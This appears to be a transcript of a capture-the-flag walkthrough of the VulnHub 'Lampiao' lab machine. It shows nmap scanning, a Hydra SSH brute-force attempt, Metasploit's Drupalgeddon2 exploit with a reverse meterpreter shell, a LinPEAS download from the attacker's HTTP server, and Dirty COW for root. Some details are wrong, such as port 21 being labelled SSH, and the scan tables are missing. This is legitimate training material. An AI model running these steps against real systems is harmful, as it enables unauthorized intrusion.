Hello everyone! Welcome to my new video.
Today, we're exploring a vulnerable machine called "Lampiao". This
machine is part of a single series on VulnHub, rated as Easy in terms
of difficulty.
To get started, head over to the VulnHub website and download the vulnerable image for "Lampiao".
If you're
new to VulnHub, be sure to check out our VulnHub playlist for helpful videos
that will guide you through the process.
Vulhub provides a collection of pre-built vulnerable environments. This resource is designed to help you practice penetration testing and vulnerability assessment skills on a variety of systems.
Let's dive in and see how we can exploit
this machine!
Settings Up
Once you've downloaded the image, the next
step is setting up the server in VirtualBox.
The downloaded image is in the
form of a ZIP file, so the process involves extracting the ZIP file and
installing it by creating a new VM.
First, we need to extract the ZIP file
using WinRAR. After extraction, I discovered several helpful files, including
the VMDK files.
Our next step involves creating a new virtual machine. In VirtualBox, click on "New" to
create a new VM.
Name it "Lampiao" and select the operating system
type as Linux. Set the version to "Other Linux 64-bit," since we are
unsure of the exact distribution.
Proceed by allocating RAM for your VM and
click "Next."
Select "Use an existing virtual hard disk file"
and import the VMDK file extracted earlier.
After clicking "Next," click on
"Finish" to complete the setup.
Once the import is finished, you'll
see the "Lampiao" vulnerable machine in the VirtualBox manager. For
better organization, let me regroup it into the VulnHub group.
Now, change the Network adapter to
"Host-Only."
It's important to ensure that both your Kali Linux
machine (used for attacks) and the vulnerable machine are connected to the same
network, so make sure they're both connected via the host-only adapter.
Next, attempt to start the VM to check if
it works, and you'll notice that our vulnerable machine is ready, with a
login prompt awaiting.
Let's dive into the fun!
Enumeration
Identify the IP address
The initial step in our attack is
enumeration, which involves identifying the IP address of our target machine
using NetDiscover. To execute this, open a terminal and run "netdiscover -i" followed by specifying the network interface name, which in this
case is "eth1."
┌──(kali㉿kali)-[~]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.99.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
From the scan results, we've obtained our
target IP address: "192.168.95.21."
Conduct Network Scan to identify Open Ports
Next, we'll conduct a network scan to
identify open ports, a crucial step in the enumeration process. This helps us
understand the attack surface and strategize targeted attacks. We'll use the
popular Nmap tool for this task.
nmap -sC -sV {Specify the IP Address}
In this command,
"-sC" is used to perform a script scan using the default set
of scripts,
while "-sV" enables version detection, allowing us
to identify which versions are running on which port.
┌──(kali㉿kali)-[~]
└─$ nmap -sC -sV 192.168.95.21
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-25 06:52 IST
1 service was unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.03 seconds
┌──(kali㉿kali)-[~]
└─$
After completing the network scan, we
identified 2 open ports:
Port 21 TCP: This indicates an SSH service
is running on the target machine. Accessing this service with valid credentials
would allow us to log in successfully.
Port 80 TCP: This port is running an HTTP
service. Nmap couldn't identify the specific web service running on it,
suggesting it might be a custom web server or one with a very basic
configuration.
Web Enumeration Port 80
Now, let's explore the content of the
website running on Port 80. To look at the contents ourselves, open a web
browser of your choice, and navigate to the target’s IP address in the URL bar
at the top of the window.
This webpage contains text-based
content or you can say it as it contains ASCII text. There don't appear to
be any vulnerabilities here, meaning this area isn't suitable for further
escalation.
For Further Escalation, Let me check if
there are any other open ports left, by running Nmap to find all open ports.
┌──(kali㉿kali)-[~]
└─$ nmap -sC -sV 192.168.95.21 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-25 06:54 IST
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.10 seconds
┌──(kali㉿kali)-[~]
└─$
Nmap reveals that there is another open
port:
Port 1898 TCP: This port is running an
Apache HTTP Server (version 2.4.7) and is hosting a Drupal 7 content management
system (CMS). The website is titled "Lampiäo."
Web Enumeration Port 1898
To explore the content on Port 1898, enter
the target's IP address in your web browser's URL bar, followed by a colon and
the port number.
Upon accessing the website, you will see a
page titled "Lampião." This page appears to be a discussion or
informational site about Lampião, a notable historical figure in Brazil.
The main section of the page features an
article titled "Lampião, herói ou vilão do Sertão?" which translates
to "Lampião, hero or villain of the Sertão?"
This article, posted by
a user named Tiago on April 19, 2018, delves into the controversial legacy of
Lampião. It examines how Lampião is viewed both as an idol by some and as a
murderer by others. The article emphasizes the dual nature of his reputation,
noting that Lampião, a highly enigmatic figure in Brazilian history, was both
feared and admired by those he affected. It invites readers to explore his
complex story further.
Additionally, the website includes sections
for users to log in, create a new account, or request a new password.
This
suggests that the website might offer interactive or personalized features for
registered users.
Below the main article, there is another
entry titled "First article..." posted by a user named Eder on April
20, 2018.
This entry seems to be a test post, featuring a brief message, a
reference to an audio file named "LuizGonzaga-LampiaoFalou.mp3," and
a note indicating that "Node 2 is not working."
Upon analyzing the website content, I came
up with two ideas to gain a foothold on the target system.
We will try to brute force the system to obtain the username and
password.
The 2nd method is more reliable and logical, as it involves
exploiting a vulnerability in the target system.
Foothold
Method 1: Try to brute force to obtain the credential
Let's explore how we can gain a foothold
using the first method:
Upon analyzing the website, I discovered
that there are two users, Tiago and Eder, who participate in writing the blogs.
These names appear to be potential usernames for the target system. To attempt to find their login credentials,
we can use Hydra against the SSH service. First, we have to save the usernames to a
file named, “username.txt”.
Next, we need a password wordlist. For
this, we will use CeWL.
CeWL is
a Ruby application that spiders a given URL up to a specified depth and returns
a list of words that can be used for password cracking.
Learn how to generate wordlists for penetration testing and security research. This guide covers various tools and techniques to create customized wordlists for different scenarios.
To see the various options for building a
wordlist, run:
┌──(kali㉿kali)-[~]
└─$ cewl --help
CeWL 6.1 (Max Length) Robin Wood ([email protected]) (https://digi.ninja/)
Usage: cewl [OPTIONS] ... <url>
OPTIONS:
-h, --help: Show help.
-k, --keep: Keep the downloaded file.
-d <x>,--depth <x>: Depth to spider to, default 2.
-m, --min_word_length: Minimum word length, default 3.
-x, --max_word_length: Maximum word length, default unset.
-o, --offsite: Let the spider visit other sites.
--exclude: A file containing a list of paths to exclude
--allowed: A regex pattern that path must match to be followed
-w, --write: Write the output to the file.
-u, --ua <agent>: User agent to send.
-n, --no-words: Don't output the wordlist.
-g <x>, --groups <x>: Return groups of words as well
--lowercase: Lowercase all parsed words
--with-numbers: Accept words with numbers in as well as just letters
--convert-umlauts: Convert common ISO-8859-1 (Latin-1) umlauts (ä-ae, ö-oe, ü-ue, ß-ss)
-a, --meta: include meta data.
--meta_file file: Output file for meta data.
-e, --email: Include email addresses.
--email_file <file>: Output file for email addresses.
--meta-temp-dir <dir>: The temporary directory used by exiftool when parsing files, default /tmp.
-c, --count: Show the count for each word found.
-v, --verbose: Verbose.
--debug: Extra debug information.
Authentication
--auth_type: Digest or basic.
--auth_user: Authentication username.
--auth_pass: Authentication password.
Proxy Support
--proxy_host: Proxy host.
--proxy_port: Proxy port, default 8080.
--proxy_username: Username for proxy, if required.
--proxy_password: Password for proxy, if required.
Headers
--header, -H: In format name:value - can pass multiple.
<url>: The site to spider.
┌──(kali㉿kali)-[~]
└─$
Now, use CeWL to generate a wordlist by specifying
the URL, and the -w option to save the words to a
file.
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-05-25 09:23:31
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1688 login tries (l:2/p:844), ~106 tries per task
I do not prioritize this method because the
main objective is to demonstrate the exploitation of the Drupal CMS. Therefore,
let's focus on exploiting the vulnerability to gain a foothold on the server.
Method 2: Exploiting the vulnerability
We previously identified that the web
server is running a Drupal 7 content management system (CMS), which was confirmed
using Wappalyzer.
Given that this version of Drupal is outdated, it is likely
to have known vulnerabilities. Let’s investigate further to see if we can
exploit any of these vulnerabilities.
There is a tool called Searchsploit that is commonly
used to search for exploits offline, without needing an internet connection.
Searchsploit is a command-line utility that allows you to search the Exploit
Database (EDB) for information on exploits and vulnerabilities.
When we use Searchsploit to search for
Drupal-related exploits, particularly for Drupal 7, it will provide a list of
various exploits and vulnerabilities.
These exploits, including the notable
'Drupalgeddon' series, represent critical vulnerabilities that can allow us to
gain full control of a Drupal website. The exploits cover multiple attack
vectors such as SQL injection, remote code execution, cross-site scripting, and
arbitrary file upload.
Some of these vulnerabilities are integrated into
frameworks like Metasploit, which means they can be exploited using automated
tools.
Additionally, certain vulnerabilities are specific to particular Drupal
modules.
In this session, we will use the Drupalgeddon2 Remote Code Execution
vulnerability to gain access to the target system.
Exploit Drupel CMS using MSF Console
This process involves using
the Metasploit Framework.
Learn how to install and use the Metasploitable framework for penetration testing and security research. This guide provides step-by-step instructions to set up Metasploitable on your system.
Launch the Metasploit Console (MSF console).
This initializes the Metasploit database and starts the Metasploit console.
$ sudo msfdb init && msfconsole
[sudo] password for kali:
[i] Database already started
[i] The database appears to be already configured, skipping initialization
Metasploit tip: Use the edit command to open the currently active module
Once
the MSFconsole is launched, use the search command to find the Drupalgeddon2 exploit.
This command lists all matching modules related to Drupalgeddon2.
msf6 > search Drupalgeddon2
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/drupal_drupalgeddon2 2018-03-28 excellent Yes Drupal Drupalgeddon 2 Forms API Property Injection
1 \_ target: Automatic (PHP In-Memory) . . . .
2 \_ target: Automatic (PHP Dropper) . . . .
3 \_ target: Automatic (Unix In-Memory) . . . .
4 \_ target: Automatic (Linux Dropper) . . . .
5 \_ target: Drupal 7.x (PHP In-Memory) . . . .
6 \_ target: Drupal 7.x (PHP Dropper) . . . .
7 \_ target: Drupal 7.x (Unix In-Memory) . . . .
8 \_ target: Drupal 7.x (Linux Dropper) . . . .
9 \_ target: Drupal 8.x (PHP In-Memory) . . . .
10 \_ target: Drupal 8.x (PHP Dropper) . . . .
11 \_ target: Drupal 8.x (Unix In-Memory) . . . .
12 \_ target: Drupal 8.x (Linux Dropper) . . . .
13 \_ AKA: SA-CORE-2018-002 . . . .
14 \_ AKA: Drupalgeddon 2 . . . .
Interact with a module by name or index. For example info 14, use 14 or use exploit/unix/webapp/drupal_drupalgeddon2
msf6 >
Let’s select the first module from the
search results using the use command.
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-meta
sploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Path to Drupal install
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.0.2.15 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic (PHP In-Memory)
View the full module info with the info, or info -d command.
msf6 exploit(unix/webapp/drupal_drupalgeddon2) >
The Key options include:
RHOSTS (the target
host),
RPORT (the target port),
TARGETURI (the path to the Drupal install), and
LHOST (the local host for the reverse connection).
Now, let’s configure the target host IP
address (192.168.95.21), and set the target port to 1898,
which is where the vulnerable Drupal instance is running.
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set RHOSTS 192.168.95.21
RHOSTS => 192.168.95.21
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set RPORT 1898
RPORT => 1898
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set LHOST 192.168.95.3
LHOST => 192.168.95.3
msf6 exploit(unix/webapp/drupal_drupalgeddon2) >
Now, we will set the local IP address where
the Metasploit instance will listen for the reverse connection.
If you don’t
know your Local IP address, then use the ifconfig command.
Now, let’s attempt to run the exploit to
gain a foothold on the target system, which will lead to further escalation. Now, run the exploit command.
[*] Started reverse TCP handler on 192.168.95.3:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Sending stage (39927 bytes) to 192.168.95.21
[*] Meterpreter session 1 opened (192.168.95.3:4444 -> 192.168.95.21:55260) at 2024-05-25 09:08:46 +0530
meterpreter >
After running
the exploit command, the Metasploit Framework automatically checked the target
system and confirmed it was vulnerable. The exploit was successful, and the
payload was executed, establishing a Meterpreter session. This means we now have remote control over the target system through the Meterpreter shell.
Next, we need to switch from the Meterpreter session to a standard shell session. This allows us to execute system commands directly. However, the shell did not provide an
interactive command line interface.
To verify this, I ran a command to check
the current user ID. This confirmed that the shell operates under the www-data
user account, which is a low-privilege account typically used by web servers.
Let’s upgrade the shell to make it more
interactive. We’ll use Python to spawn an interactive Bash shell. First, check
which Python version is available on the target system by running, which
Python.
Then, use Python to start a new Bash shell
with the following command. This command provides a more stable and functional
shell environment.
python -c "import pty;pty.spawn('/bin/bash')"
www-data@lampiao:/var/www/html$
Next, we need to locate the user flag.
Begin by navigating to the home directory and listing its contents.
www-data@lampiao:/var/www/html$ cd /home
cd /home
www-data@lampiao:/home$ ls
ls
tiago
www-data@lampiao:/home$
In the home directory, I found a directory
named tiago. This directory appears to belong to the user tiago. Change into this directory.
However, I couldn’t find the user flag
here. It’s possible that the root flag might be located in the root directory.
Attempting to navigate to the root directory.
www-data@lampiao:/home/tiago$ cd /root
cd /root
bash: cd: /root: Permission denied
www-data@lampiao:/home/tiago$
I encountered a "Permission
denied" error, indicating that the current user does not have sufficient
privileges to access this directory.
The next step is to identify any files or
directories that might contain useful information for privilege escalation.
Privilege Escalation.
During the privilege escalation process,
our primary goal is to gather system information and identify any
vulnerabilities or misconfigurations that could provide elevated privileges,
ultimately allowing us to gain root access.
Previously, we found that we do not have
sufficient user permissions to perform user permission enumeration to
understand the user's rights and privileges on the system.
Escalate the Privileges using LinPEAS
To proceed with privilege escalation
directly from our current position, we can use a tool like LinPEAS.
LinPEAS is
a script that helps automate the process of identifying potential weaknesses in
the system that could be exploited for privilege escalation.
First, we have to send it to the target system. To proceed, we need the LinPEAS script, which can be downloaded from GitHub.
Check out the latest release of PEASS-ng, a set of scripts to perform privilege escalation on Windows and Linux systems. This release includes new features and improvements for better performance and usability.
Next,
we need to transfer the LinPEAS script to the target system. To do this, we can
set up a simple HTTP server on our machine to serve the script.
Use Python to create an HTTP server to host
the LinPEAS script. Run the following command in the directory where the
LinPEAS script is located.
This will start an HTTP server on port 8000. Ensure
this port is accessible from the target system.
┌──(kali㉿kali)-[~/Downloads]
└─$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
Once the HTTP server is hosted, on the target
shell, Change the directory to /tmp.
www-data@lampiao:/home/tiago$ cd /tmp
cd /tmp
www-data@lampiao:/tmp$
To download the linpeas.sh
file, we will use the wget command.
First, list all files and directories to
verify whether linpeas.sh has execution permissions. It does not, so, we will
need to modify the permissions. To make linpeas.sh executable, use the chmod
command.
www-data@lampiao:/tmp$ ls -al
ls -al
total 852
drwxrwxrwt 2 root root 4096 May 25 00:41 .
drwxr-xr-x 21 root root 4096 Apr 19 2018 ..
-rw-r--r-- 1 www-data www-data 862779 May 21 18:00 linpeas.sh
www-data@lampiao:/tmp$ chmod +x linpeas.sh
chmod +x linpeas.sh
www-data@lampiao:/tmp$
Next, run linpeas.sh
to perform a comprehensive scan of the system for privilege escalation
opportunities.
ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and/or with the computer owner's permission.
The script will examine various aspects of the system, including
misconfigurations, outdated or vulnerable software versions, and other security
weaknesses that could be exploited to gain higher privileges:
Local Privilege Escalation (CVE-2016-5195_dirtycow 2)
After analyzing the output, I discovered
that the target system is vulnerable to a Local Privilege Escalation (LPE)
attack. Among various scripts tested, I identified a suitable vulnerability to
exploit: CVE-2016-5195, also known as the "Dirty COW" vulnerability.
Upon execution, we obtained a root shell,
which I confirmed using the whoami command. Since we have a root shell, let’s
change the directory to the root and check if we can find the root flag.
.png)
.png)
.png)
.png)
.png)
.png)
.png)
.png)
.png)
.png)
.png)
.png)
.png)
.png)
.png)
.png)
.png)
.png)
.png)
